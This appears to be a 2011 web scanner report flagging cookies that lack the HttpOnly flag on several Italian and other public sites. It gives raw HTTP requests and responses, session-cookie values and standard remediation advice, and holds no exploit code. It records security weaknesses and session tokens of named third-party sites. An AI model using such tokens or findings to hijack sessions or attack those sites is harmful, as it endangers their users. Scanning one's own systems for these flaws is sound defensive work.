AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 23:04:57 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Set-Cookie: AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/ Location: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=40572&clicktag=[URLTRACKING]&rnd=[RANDOM] Content-Length: 340 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://ieo.solution.weborama.fr/fcgi-bin/adserv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /add HTTP/1.1
Host: it.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 22:25:38 GMT
Set-Cookie: B=b85h77h6rubr2&b=3&s=u7; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Location: http://it.add.yahoo.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Server: YTS/1.20.0

<html><body>This page has moved, please <a href="http://it.add.yahoo.com/">click here</a> to go to its new location.</body></html><!-- w95.fp.re1.yahoo.com uncompressed/chunked Mon May 2 15:25:38 PDT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.cookie.js HTTP/1.1
Host: local.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Alice Mail: e-mail gratis e posta elettronica sicura</title> <meta http-equi ...[SNIP]...
Request
GET /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: omniture.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:16:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DF96978507A1D7-6000010040005559[CE]; Expires=Sat, 30 Apr 2016 22:16:15 GMT; Domain=.virgilio.it; Path=/
Location: http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&pccr=true&vidn=26DF96978507A1D7-6000010040005559&&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 01 May 2011 22:16:15 GMT
Last-Modified: Tue, 03 May 2011 22:16:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www2
Content-Length: 0
Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /execute.cgi HTTP/1.1
Host: paginebianche.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bin/search HTTP/1.1
Host: search.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:26:52 GMT
Set-Cookie: B=bpo29tt6rubtc&b=3&s=kb; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: sSN=3eSvUDo2wWFRGwNfu4Zai5tBVkIRVcnL10fjiylXzSdqNCm1Gni_b8k7hSc2rpURGtOsHmJqBbg7yUFu05.v1w--; path=/; domain=.search.yahoo.com
Location: http://search.yahoo.com/web?fr=
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 86

<!-- syc13.search.ac2.yahoo.com uncompressed/chunked Mon May 2 15:26:52 PDT 2011 -->
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login.php HTTP/1.1
Host: account.musfiber.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" --> <he ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/recuperapassword.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/registrautente.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p18485/serv.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p21608/serv2.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:30 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p21618/serv3.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:31 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pr_home.jsp HTTP/1.1
Host: attiva.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:34 GMT
Server: Apache/2.0.63 (Unix) mod_jk/1.2.26
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Set-Cookie: JSESSIONID=1BA822532BA5DF3E077B74D8659CF3A1.worker2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 15704

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webapp/wcs/stores/servlet/PartnerVisit HTTP/1.1
Host: compraonline.mediaworld.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HELM=Password=&Username=; ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forgotPassword.asp?noreturn=yes HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 4812
Content-Type: text/html
Expires: Sun, 01 May 2011 21:20:28 GMT
Set-Cookie: HELM=Password=&Username=; path=/
Set-Cookie: ASPSESSIONIDCCABDABT=JDAKGJPDBNFFGPKGHBLCENLI; path=/
ACCEPT-RANGES: none

<html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" / ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forgotPassword.asp?noreturn=yes HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:27:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 4812
Content-Type: text/html
Expires: Sun, 01 May 2011 21:27:28 GMT
Set-Cookie: HELM=Password=&Username=; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=ELBIJAJDLCPFIJBGMHMCMHEA; path=/
ACCEPT-RANGES: none

<html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" / ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.asp HTTP/1.1
Host: eprocurement.eni.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: expertsystem.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26280
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCACDTTDR=JFEIGGPCPJLGOBDOHIGKMLDP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en HTTP/1.1
Host: factbook.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en/home HTTP/1.1
Host: factbook.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fcxp HTTP/1.1
Host: finanza-mercati.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!-- DUMMY PAGE QUI SI E' VERIFICATO UN ERRORE: "La risorsa richiesta non e' attualmente disponibile sul server. Per favore controllare" DUMMY PAGE -->
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: mightyblue.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 37743
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQASDSRC=EMENEEBDJOOMEPPBDBBOJNOH; path=/
Cache-control: private
ACCEPT-RANGES: none

<html> <head> <title>MightyBlue.com Hosting Services</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <META name="description" content="MightyBlue Web and Email hos ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /it_en HTTP/1.1
Host: multicard.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /execute.cgi HTTP/1.1
Host: paginebianche.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pgolfe/action HTTP/1.1
Host: paginegialle.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT'
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 22:26:38 GMT
Content-Length: 12417
Connection: close
Set-Cookie: kpi=195.27.58.40.49021304375198356; path=/; expires=Thu, 29-Apr-21 22:26:38 GMT; domain=.paginegialle.it
Set-Cookie: sessionid=7101682110525820065; Path=/
Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1
Host: rainbow.mythings.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:16:02 GMT
Expires: -1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Microsoft-IIS/6.0
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/
Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
X-AspNet-Version: 4.0.30319
x-machine-name: Rainbow-28 (i-00667d77)
X-Powered-By: ASP.NET
Content-Length: 3147
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /definition/expert-system HTTP/1.1
Host: searchcio-midmarket.techtarget.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:29:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=57A0F5F504CF1CC8C3E5AC2F73CA1B4A; Path=/
Cache-Control: max-age=600
Expires: Mon, 02 May 2011 21:39:33 GMT
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/
Content-Length: 53314
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry HTTP/1.1
Host: searchcio.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:10 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8A0EC464EE7664CEA88D868EA802EB5D; Path=/
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Connection: close
Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/
Content-Length: 73912
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=abciclqX8qHL2b3JM0Y_s; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kw HTTP/1.1
Host: technology.searchcio-midmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Resin/3.1.5
Pragma: no-cache
Cache-Control: no-cache
Expires: 0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en
Set-Cookie: JSESSIONID=abciclqX8qHL2b3JM0Y_s; path=/
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Mon, 02 May 2011 22:27:04 GMT
Content-Length: 17205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Sear ...[SNIP]...
